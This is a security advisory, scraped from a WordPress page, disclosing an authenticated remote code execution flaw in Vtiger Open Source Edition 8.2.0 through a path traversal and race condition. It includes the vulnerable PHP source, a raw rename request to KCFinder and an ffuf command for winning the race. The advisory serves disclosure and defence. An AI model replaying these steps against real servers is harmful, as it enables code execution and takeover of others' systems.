\nAffected Version<\/strong>: Open Source Edition 8.2.0
\nVulnerability Type<\/strong>:Unrestricted Upload of File with Dangerous Type (CWE-434)
\nSecurity Risk<\/strong>: Critical
\nVendor<\/strong>: Vtiger
\nVendor URL<\/strong>: https:\/\/www.vtiger.com\/<\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status<\/strong>: Fixed
\nCVE Number<\/strong>: Requested
\nCVE Link<\/strong>: Requested<\/p>\n
Description<\/h3>\n
Vtiger Open Source Edition 8.2.0 allows low-privileged authenticated users to execute arbitrary code. The calendar module is vulnerable to a path traversal when creating short-lived temporary files. By winning a race condition, these files can be renamed due to an insufficient deny list and made executable, allowing the execution of arbitrary code. The default Docker image is vulnerable, as well as all systems that are configured to evaluate .phar<\/strong> files.<\/p>\n In summary, the vulnerability works as follows:<\/p>\n Relevant source code is located in modules\/Calencar\/CalendarCommon.php<\/strong>:<\/p>\n The function triggers the generation of an ics file in Line 161 and, after sending it via email to invited users, deletes it in Line 180.<\/p>\n The function generateIcsAttachment<\/strong> is responsible for creating the ics file. It uses the subject of an event as part of the filename (c.f. Line 225) and uses it without validation or sanitization as file name in Line 230. Parts of the created file are controllable, e.g., via the description<\/strong> field in Line 236.<\/p>\n In combination, this allows the creation of a short-lived .ics<\/strong> file with dangerous contents.<\/p>\n A default installation of Vtiger contains KCFinder in version 2.21 at \/kcfinder\/browse.php<\/strong>. Among other functionality available to authenticated users, it allows renaming of files that are stored in its path. In the default docker installation, the controllable path is \/app\/test\/upload\/images<\/strong>.<\/p>\n The HTTP request above renames Event.ics<\/strong> to Event.ics.phar<\/strong>. Most dangerous extensions are blocked, but .phar<\/strong> is not in the default deny list.<\/p>\n Note that PHP does only execute one request in parallel for each session ID. Hence, the cookie session ID used in the request above should be used only for the rename operation and not reused for the event creation. Two different sessions by the same user work.<\/p>\n In order to hit the race condition reliably, the rename operation can be performed in quick succession with ffuf --request Rename.req --request-proto http --input-cmd 'true' --input-num 100000 --fr 'Unknown error' -t 120<\/strong>.<\/p>\n With ffuf<\/strong> running in the background, an event is created as shown in the following screenshot.<\/p>\n The subject of the event specifies the path in which the temporary .ics<\/strong> file will be created. To create it inside the folder KCFinder is able to control, it suffices to place the file in the images<\/strong> directory. The description field contains the PHP code that will be executed.<\/p>\n If the race condition is hit, the file is renamed as shown in the following screenshot. Winning the race condition worked first try in most attempts.<\/p>\n When opening the file, the PHP code is executed.<\/p>\n Multiple separate adjustments are recommended for an in-depth fix:<\/p>\n Users of Vtiger should upgrade to a patched version.<\/p>\n This security vulnerability was identified by Florian Dewald, Tim Kranz, and Ole Wagner of usd AG.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2024-0016 | Vtiger Open Source Edition 8.2.0 - Authenticated Remote Code Execution Product: Vtiger Affected Version: Open Source Edition 8.2.0 Vulnerability Type:Unrestricted Upload of File with Dangerous Type (CWE-434) Security Risk: Critical Vendor: Vtiger Vendor URL: https:\/\/www.vtiger.com\/ Vendor acknowledged vulnerability: Yes Vendor Status: Fixed CVE Number: Requested CVE Link: Requested Description Vtiger Open Source Edition […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-23998","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23998","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=23998"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23998\/revisions"}],"predecessor-version":[{"id":24049,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/23998\/revisions\/24049"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=23998"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Proof of Concept<\/h3>\n
\n
<\/span>function sendInvitation($inviteesid,$mode,$recordModel,$desc) {<\/span>\n global $current_user,$mod_strings;<\/span>\n require_once(\"vtlib\/Vtiger\/Mailer.php\");<\/span>\n $invitees_array = explode(';',$inviteesid);<\/span>\n\n if($desc['mode'] == 'edit') {<\/span>\n $subject = vtranslate(\"LBL_UPDATED_INVITATION\", \"Calendar\").' : ';<\/span>\n } else {<\/span>\n $subject = vtranslate(\"LBL_INVITATION\", \"Calendar\").' : ';<\/span>\n }<\/span>\n $subject .= $recordModel->get('subject');<\/span>\n $attachment = generateIcsAttachment($desc);<\/span>\n foreach($invitees_array as $inviteeid) {<\/span>\n if($inviteeid != '') {<\/span>\n $description=getActivityDetails($desc,$inviteeid,\"invite\",$recordModel);<\/span>\n $description = getMergedDescription($description, $recordModel->getId(), 'Events');<\/span>\n $to_email = getUserEmailId('id',$inviteeid);<\/span>\n $to_name = getUserFullName($inviteeid);<\/span>\n $mail = new Vtiger_Mailer();<\/span>\n $mail->IsHTML(true);<\/span>\n $currentUserModel = Users_Record_Model::getCurrentUserModel();<\/span>\n $userName = $currentUserModel->getName();<\/span>\n $fromEmail = Emails_Record_Model::getFromEmailAddress();<\/span>\n $mail->ConfigSenderInfo($fromEmail,$userName);<\/span>\n $mail->Subject = $subject;<\/span>\n $mail->Body = $description;<\/span>\n $mail->AddAttachment($attachment, '', 'base64', 'text\/calendar');<\/span>\n $mail->SendTo($to_email, decode_html($to_name), false, false, true);<\/span>\n }<\/span>\n }<\/span>\n unlink($attachment);<\/span>\n\n}<\/span>\n<\/pre>\n<\/div>\nfunction generateIcsAttachment($record) { \n $fileName = str_replace(' ', '_', decode_html($record['subject'])); \n $assignedUserId = $record['user_id']; \n $userModel = Users_Record_Model::getInstanceById($assignedUserId, 'Users'); \n $userLabel = $userModel->entity->column_fields['userlabel']; \n $email = $userModel->entity->column_fields['email1']; \n $fp = fopen('test\/upload\/'.$fileName.'.ics', \"w\"); \n fwrite($fp, \"BEGIN:VCALENDAR\\nVERSION:2.0\\nBEGIN:VEVENT\\n\"); \n fwrite($fp, \"ORGANIZER;CN=\".$userLabel.\":MAILTO:\".$email.\"\\n\"); \n fwrite($fp, \"DTSTART:\".date('Ymd\\THis\\Z', strtotime($record['st_date_time'])).\"\\n\"); \n fwrite($fp, \"DTEND:\".date('Ymd\\THis\\Z', strtotime($record['end_date_time'])).\"\\n\"); \n fwrite($fp, \"DTSTAMP:\".date('Ymd\\THis\\Z').\"\\n\"); \n fwrite($fp, \"DESCRIPTION:\".$record['description'].\"\\nLOCATION:\".$record['location'].\"\\n\"); \n fwrite($fp, \"STATUS:CONFIRMED\\nSUMMARY:\".$record['subject'].\"\\nEND:VEVENT\\nEND:VCALENDAR\"); \n fclose($fp); return 'test\/upload\/'.$fileName.'.ics';\n}<\/pre>\n<\/span>POST<\/span> \/kcfinder\/browse.php?type=images&lng=en&act=rename<\/span> HTTP<\/span>\/<\/span>1.1<\/span>
Host<\/span>:<\/span> localhost<\/span>
Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded<\/span>
Content-Length<\/span>:<\/span> 63<\/span>
Cookie<\/span>:<\/span> PHPSESSID=[... REDACTED ...];<\/span>\n\ndir<\/span>=<\/span>images<\/span>&<\/span>file<\/span>=<\/span>Event.ics<\/span>&<\/span>newName<\/span>=<\/span>Event.ics.phar<\/span>&<\/span>something<\/span>=<\/span>FUZZ<\/span>
<\/pre>\n<\/div>\n![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/05\/EventCreate2.png\")
<\/p>\n![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/05\/PharFileCreated.png\")
<\/p>\n![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/05\/PharExecuted.png\")
<\/p>\nFix<\/h3>\n
\n
\n
References<\/h3>\n
\n
Timeline<\/h3>\n
\n
Credits<\/h3>\n